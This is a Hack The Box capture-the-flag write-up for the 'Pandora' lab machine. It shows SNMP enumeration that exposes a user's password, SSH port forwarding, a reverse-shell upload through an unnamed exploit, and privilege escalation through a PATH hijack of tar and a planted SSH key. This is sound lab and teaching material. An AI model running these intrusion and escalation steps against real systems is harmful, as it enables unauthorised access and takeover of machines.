Pandora HTB
Enumeration
Using nmap enumeration:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
PORT STATE SERVICE
161/udp open snmp
There is a website on port :
Using gobuster found some directories but wasnt useful Using snmpwalk walk to enumerate: snmpwalk -c public -v2c 10.10.11.136 Found Credentials on snmpwalk:
daniel : HotelBabylon23
Exploitation
Logging in using ssh found one more user matt in home directory.
Checking apache servers in /etc/apache2/sites-available: pandora.conf
The port is on localhost so forwarding is needed. Using ~ to give command in ssh and then type "C" to give additional arguments ssh daniel@10.10.11.136 -L 8000:127.0.0.1:80 Visiting 127.0.0.1:8000
Using this exploit And uploading php reverse shell Using linpeas
Now analysing the file pandora_backup located at /usr/bin/pandora_backup
Using ghidra we can see
Now doing a path hijack
echo /bin/bash > tar
export PATH=/home/matt:$PATH
chmod +x tar

This doesn't work due to an error with sudo
It doesn't run from this shell so getting an ssh shell. To get a ssh shell in matt:
generate key pair with
ssh-keygendrop public key into
/home/matt/.ssh/authorized_keysGive appropriate permissions
chmod 700 /home/matt/.ssh
chmod 600 /home/matt/.ssh/authorized_keysssh -i id_ed25519 matt@10.10.11.136Login using ssh Nowsudo -lworks with ssh:
Now running pandora_backup we get root: 
Beyond Root
To trace back the process we did echo $$ first and went back from there in ps -ef
SUID binaries failed to run due to the pandora.conf in apache2:
It runs as user matt and group matt The /etc/apache2/mods-enabled directory shows the various modules that are enabled, and mpm-itk is there (typically items in the *-enabled directories are symbolic links to items in the *-available directories):
Last updated
Was this helpful?